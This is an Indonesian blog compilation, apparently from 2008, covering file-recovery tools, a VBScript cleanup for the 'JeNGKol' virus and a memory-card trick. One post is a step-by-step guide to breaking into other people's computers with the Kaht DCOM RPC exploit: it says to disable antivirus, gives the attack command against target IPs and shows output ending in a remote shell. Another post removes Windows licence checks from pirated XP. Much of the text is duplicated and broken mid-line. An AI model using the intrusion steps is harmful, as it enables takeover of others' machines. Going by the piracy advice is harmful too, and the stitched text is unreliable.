Pernah menghapus file-file penting di komputer tanpa disengaja? Kasus seperti ini mungkin pernah menimpa Anda, terkadang terjadi karena kita tengah terburu-buru atau dikejar waktu.
Namun jangan khawatir, Anda bisa menggunakan tools khusus untuk mengembalikan file-file tadi. Berikut ini ada 4 tools yang bisa Anda gunakan untuk mengembalikan file yang terhapus. Tools ini dapat di-download secara gratis di internet.
1. Undelete Plus
Di antara aplikasi-aplikasi gratis yang beredar di luaran untuk mengembalikan file yang terhapus, Undelete Plus salah satu yang dapat digunakan. User interface-nya (antar muka) tergolong sangat simpel. Anda dapat mengembalikan file-file yang terhapus dengan mudah sesuai dengan tipe file, misalnya Application, GIF graphics, HTML Documents, PDF.
Tools ini beroperasi pada sistem operasi Windows 95, Windows 98, Windows Me, Windows NT, Windows 2000, Windows XP, Windows 2003 dan Windows Vista. Anda dapat men-download Undelete Plus di: http://www.undelete-plus.com/
2. Restoration
Restoration adalah salah satu aplikasi untuk mengembalikan file yang terhapus. Tools ini juga sangat mudah digunakan dan tidak perlu diinstal di komputer. Cukup download toolsnya di: http://www.snapfiles.com/get/restoration.html, lalu jalankan file executable-nya untuk mengembalikan file yang terhapus.
3. PC Inspector File Recovery
Meski user interface PC inspector File Recovery tidak begitu user friendly, aplikasi ini tergolong sangat ampuh untuk mendeteksi dan mengembalikan file yang terhapus. Sesudah dilakukan proses scanning, akan tersaji file-file yang terhapus dalam folder dengan struktur pohon (tree structure) untuk mempermudah pencarian. Dengan begitu, Anda dengan mudah dapat mencari dan memilih file/folder yang terhapus, lalu klik icon "save" untuk mengembalikan file. Tools ini dapat di-download di: http://www.pcinspector.de/Sites/file_recovery/info.htm?language=1
4. Recuva
Recuva sering disebut juga sebagai "Recover". User interface-nya sangat sederhana. Pada mode basic, tools ini akan menampilkan daftar file-file yang terhapus yang bisa dikembalikan. Jika Anda menggantinya ke mode advanced, maka proses scanning ulang akan dilakukan dan muncul pilihan untuk menampilkan informasi berisi daftar file-file yang terhapus. Tools ini dapat di-download di: http://www.recuva.com/
detik.com
Senin, Desember 08, 2008
6 Langkah Membersihkan Virus 'JeNGKol'
Salah satu ciri komputer terinfeksi virus JeNGKol adalah komputer akan logoff jika user menjalankan file .INF dan saat user mengedit file VBS.
Virus ini akan menyembunyikan file berekstensi .DOC, dengan cara membuat file duplikat sesuai dengan nama file yang disembunyikan untuk mengelabui user. Bagaimana cara membersihkan virus ini? Ikuti langkah berikut ini:
1. Putuskan komputer yang akan dibersihkan dari jaringan (LAN).
2. Nonaktifkan "System Restore" selama proses pembersihan (Windows XP).
3. Matikan proses virus. Untuk mematikan proses virus ini dapat menggunakan tools pengganti task manager seperti "Process explorer". Silahkan downlod tools tersebut di: http://download.sysinternals.com/Files/ProcessExplorer.zip.
4. Hapus registri yang dibuat oleh virus. Untuk mempermudah proses penghapusan silahkan salin script di bawah ini pada program notepad kemudian simpan dengan nama repair.vbs, kemudiai Jalankan file tersebut (klik 2x).
Dim oWSH: Set oWSH = CreateObject("WScript.Shell")
on error resume Next
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell","cmd.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot\AlternateShell","cmd.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell","cmd.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Edit\Command\","C:\Windows\System32\notepad.exe %1"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\DefaultIcon\","C:\Windows\System32\WScript.exe,2"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\Install\command\","C:\windows\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1"
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistriTools")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\RunLogonScriptSync")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\HideLegacyLogonScripts")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\HideLogoffScripts")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\HideStartupScripts")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\RunStartupScriptSync")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\run\JeNGKoL")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\NeverShowExt")
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\","VBScript Script File"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\FriendlyTypeName","VBScript Script File"
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistriTools")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\RunLogonScriptSync")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NOFind")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NORun")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\WinOldApp\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Msconfig.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\command.com\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\debugger")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\debugger")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\DisallowRun\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\Run\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ActiveDesktop\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\")
5. Hapus file duplikat yang dibuat oleh virus dengan ciri-ciri:
* Menggunakan icon JPEG atau VBS
* Ukuran 14 KB
* Type file JPEG Image atau VbScript Script File
Untuk mempermudah proses pencarian virus, silahkan gunakan fungsi Search windows.
6. Untuk pembersihan optimal dan mencegah infeksi ulang, lindungi komputer Anda dengan anti virus yang sudah dapat mendeteksi dan membasmi virus ini.
Virus ini akan menyembunyikan file berekstensi .DOC, dengan cara membuat file duplikat sesuai dengan nama file yang disembunyikan untuk mengelabui user. Bagaimana cara membersihkan virus ini? Ikuti langkah berikut ini:
1. Putuskan komputer yang akan dibersihkan dari jaringan (LAN).
2. Nonaktifkan "System Restore" selama proses pembersihan (Windows XP).
3. Matikan proses virus. Untuk mematikan proses virus ini dapat menggunakan tools pengganti task manager seperti "Process explorer". Silahkan downlod tools tersebut di: http://download.sysinternals.com/Files/ProcessExplorer.zip.
4. Hapus registri yang dibuat oleh virus. Untuk mempermudah proses penghapusan silahkan salin script di bawah ini pada program notepad kemudian simpan dengan nama repair.vbs, kemudiai Jalankan file tersebut (klik 2x).
Dim oWSH: Set oWSH = CreateObject("WScript.Shell")
on error resume Next
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command\","""%1"" %*"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell","cmd.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot\AlternateShell","cmd.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell","cmd.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\Shell\Edit\Command\","C:\Windows\System32\notepad.exe %1"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\DefaultIcon\","C:\Windows\System32\WScript.exe,2"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\Install\command\","C:\windows\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1"
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistriTools")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\RunLogonScriptSync")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\HideLegacyLogonScripts")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\HideLogoffScripts")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\HideStartupScripts")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\RunStartupScriptSync")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\run\JeNGKoL")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\NeverShowExt")
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\","VBScript Script File"
oWSH.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\FriendlyTypeName","VBScript Script File"
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistriTools")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\RunLogonScriptSync")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NOFind")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NORun")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\WinOldApp\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Msconfig.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\command.com\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\debugger")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\debugger")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\DisallowRun\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\Run\")
oWSH.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ActiveDesktop\")
oWSH.RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\")
5. Hapus file duplikat yang dibuat oleh virus dengan ciri-ciri:
* Menggunakan icon JPEG atau VBS
* Ukuran 14 KB
* Type file JPEG Image atau VbScript Script File
Untuk mempermudah proses pencarian virus, silahkan gunakan fungsi Search windows.
6. Untuk pembersihan optimal dan mencegah infeksi ulang, lindungi komputer Anda dengan anti virus yang sudah dapat mendeteksi dan membasmi virus ini.
Cara Membobol Komputer Lawan
Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain,
tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135,
yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download diWeblog kuliah online ilmu komputer .
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking
missal IP : 192.168.30.3 Kaht 192.168.30.1 192.168.30.3J
ika hacking anda berhasil akan tampil pada command line kira-kira sbb:
KAHT II - MASSIVE RPC EXPLOIT dst
[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+]Attacking Port:135.
Remote Shell at port:36388
[+] Scan In Progress……
- Connecting to 192.168.30.3 Sending Exploit to a [Win2k] Server- Connectando con la Shell Remote dst……..
C:WINNTsystem32>
Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai.
anda bisa membuat user admin membuat sharing dll Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan..
Ref.by WEblog kuliah online ilmu komputer..
tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135,
yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download diWeblog kuliah online ilmu komputer .
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking
missal IP : 192.168.30.3 Kaht 192.168.30.1 192.168.30.3J
ika hacking anda berhasil akan tampil pada command line kira-kira sbb:
KAHT II - MASSIVE RPC EXPLOIT dst
[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+]Attacking Port:135.
Remote Shell at port:36388
[+] Scan In Progress……
- Connecting to 192.168.30.3 Sending Exploit to a [Win2k] Server- Connectando con la Shell Remote dst……..
C:WINNTsystem32>
Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai.
anda bisa membuat user admin membuat sharing dll Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan..
Ref.by WEblog kuliah online ilmu komputer..
Cara menghilangkan Windows Genuine Victim di XP
Cara menghilangkan Windows Genuine Victim di XP
anda menggunakan Windows XP bajakan namun tidak sengaja windows ter-update outomatis, kemudian setelah di hidupkan dan windows terdapat tulisan Windows Genuine Victim......
berikut cara menanggulanginya...
1. jalankan windows Task Manager ( Ctrl + Alt + Del )
2. End Task wgatray.exe process
3. Restart windows XP dan masuk ke Safe mode ( tekan F8 pada saat bootting hingga muncul menu)
pilih SAVE MODE
4. hapus wgatray.exe dari c:\windows\System32
5. hapus wgatray.exe dari c:\windows\System32\dllcache
6. jalankan regedit (pada menu run.. ketig regedit dan tekan ENTER)
7. cari lokasi HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
8. hapus foldeer 'WgaLogon' dan semua contentnya
9. windows sudah pulih... silahkan reboot ulang...
setelah selesai... silahkan matikan fungsi autoupdate windows...... lagian update windows juga bikin windows berjalan tambah berat aja........
anda menggunakan Windows XP bajakan namun tidak sengaja windows ter-update outomatis, kemudian setelah di hidupkan dan windows terdapat tulisan Windows Genuine Victim......
berikut cara menanggulanginya...
1. jalankan windows Task Manager ( Ctrl + Alt + Del )
2. End Task wgatray.exe process
3. Restart windows XP dan masuk ke Safe mode ( tekan F8 pada saat bootting hingga muncul menu)
pilih SAVE MODE
4. hapus wgatray.exe dari c:\windows\System32
5. hapus wgatray.exe dari c:\windows\System32\dllcache
6. jalankan regedit (pada menu run.. ketig regedit dan tekan ENTER)
7. cari lokasi HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
8. hapus foldeer 'WgaLogon' dan semua contentnya
9. windows sudah pulih... silahkan reboot ulang...
setelah selesai... silahkan matikan fungsi autoupdate windows...... lagian update windows juga bikin windows berjalan tambah berat aja........
Tips: Kartu memori murah? Hack!
Sejalan dengan perkembangan teknologi digital
sekarang mempunyai ‘gadget’ elektronik (kamera digital
PDA
smartphone
MP3 player
dsb) merupakan suatu keharusan.
Perangkat-perangkat multimedia tersebut membutuhkan kartu memori untuk dapat menampung file data seperti gambar
musik
video
dan data lainnya. Ada beberapa format kartu memori antara lain Compact Flash (CF)
Multi Media Card (MMC)
Smart Media (SM)
Secure Digital (SD)
Microdrive (MD)
Memory Stick (MS)
dan sebagainya. Umumnya kartu memori yang disertakan pada perangkat tersebut berkapasitas relatif kecil
sedangkan untuk membeli (upgrade) kartu memori berkapasitas besar relatif mahal
tidak kurang dari 2 juta Rupiah untuk kartu memori berkapasitas 1 GB (Giga Byte) atau tidak kurang dari 7-8 juta Rupiah untuk kapasitas 4 GB.
Tertarik dengan informasi mengenai bagaimana mendapatkan kartu memori berkapasitas 4 GB dengan harga “hanya” sekitar 3 juta Rupiah saja?
Beberapa waktu lalu di dunia Internet sempat ramai dengan penemuan trik mendapatkan kartu memori digital secara murah. Ada satu produk pemutar MP3 dengan merk/tipe Creative Nomad MuVo2 4.0GB dengan kapasitas memori 4 GB
cukup untuk menampung sekitar 1000 file audio berformat MP3. Di pasaran barang ini dijual dengan harga sekitar $350 atau sekitar 3 juta Rupiah. Lalu apa yang membuat produk ini sempat laris bak kacang goreng di Amerika dan Eropa?
Berdasar penemuan Andy Mack
di dalam produk ini terdapat kartu memori Microdrive (MD) merk Hitachi berkapasitas 4 GB. Dengan membuka kotak produk ini (tentunya garansi yang anda dapatkan dari produk ini akan hangus)
kartu memori tersebut dapat dilepas dengan cukup mudah. Kartu ini kemudian dapat di-format ulang untuk digunakan di perangkat lain seperti kamera digital dan PDA
tentunya yang mendukung kartu memori Microdrive. Dengan demikian anda dapat menghemat sekitar 4-5 juta Rupiah untuk sebuah kartu memori berkapasitas 4 GB! Sebuah investasi yang sangat menguntungkan!
Sekarang anda telah mengetahui trik untuk memperoleh kartu memori dengan harga murah
lalu bagaimana memfungsikan kembali pemutar MP3 yang telah anda bongkar tersebut?
Keterangan: Baca artikel sebelumnya tentang cara mendapatkan kartu memori murah.
Jangan kuatir
anda cukup membeli kartu memori Microdrive dengan kapasitas kecil (misal 128 MB dengan harga pasaran sekitar 200-250 ribu Rupiah) untuk mengganti kartu memori yang telah dilepas. Ikuti langkah-langkah berikut tentang bagaimana mengganti dan memfungsikan kembali pemutar MP3 tersebut:
1. Download firmware pemutar MP3 dari situs http://asia.creative.com/support/drivers atau langsung download dari link ini (direkomendasikan).
Catatan: Pada saat artikel dibuat
firmware terbaru yang ada pada situs adalah versi 1.11.01 sedangkan percobaan dilakukan dengan menggunakan firmware versi 1.10.01. Disarankan untuk mendownload lewat link yang direkomendasikan. Jika link tersebut sudah tidak valid
anda bisa mencoba menggunakan firmware versi 1.11.01 atau lebih baru.
2. Pasang kartu memori pengganti ke dalam kotak pemutar MP3
ke tempat asal kartu memori 4 GB dilepas sebelumnya. Tutup kembali kotak pemutar MP3 tersebut.
3. Pada saat dihidupkan
akan tertera pesan “Recovery Mode v1.00? di layar.
4. Pilih opsi ketiga yaitu “Format All” untuk mem-format kartu memori pengganti yang baru dipasang.
5. Setelah proses format selesai
akan muncul pesan “Media Error” di layar.
6.Pilih opsi untuk memperbaharui/update firmware
7.Muncul pesan “Attach USB cable
Start FW upgrade”. Hubungkan kabel USB yang disertakan dengan pemutar MP3 ke PC.
8.Jalankan file firmware yang telah di-download sebelumnya. Akan muncul window “Creative MuVo^2 4GB Firmware Upgrade”. Tekan tombol “Upgrade” untuk memulai proses pembaharuan/upgrade firmware.
9. Pemutar MP3 tersebut dapat digunakan kembali!
Catatan: Ada beberapa merk/tipe kartu memori Microdrive yang belum berhasil dijadikan kartu memori pengganti. Lihat informasi lebih lanjut pada alamat di bawah.
Sumber informasi dan gambar:
© Andy Mack (http://www.andymack.com/mylog/pivot/entry.php?uid=standard-881)
sekarang mempunyai ‘gadget’ elektronik (kamera digital
PDA
smartphone
MP3 player
dsb) merupakan suatu keharusan.
Perangkat-perangkat multimedia tersebut membutuhkan kartu memori untuk dapat menampung file data seperti gambar
musik
video
dan data lainnya. Ada beberapa format kartu memori antara lain Compact Flash (CF)
Multi Media Card (MMC)
Smart Media (SM)
Secure Digital (SD)
Microdrive (MD)
Memory Stick (MS)
dan sebagainya. Umumnya kartu memori yang disertakan pada perangkat tersebut berkapasitas relatif kecil
sedangkan untuk membeli (upgrade) kartu memori berkapasitas besar relatif mahal
tidak kurang dari 2 juta Rupiah untuk kartu memori berkapasitas 1 GB (Giga Byte) atau tidak kurang dari 7-8 juta Rupiah untuk kapasitas 4 GB.
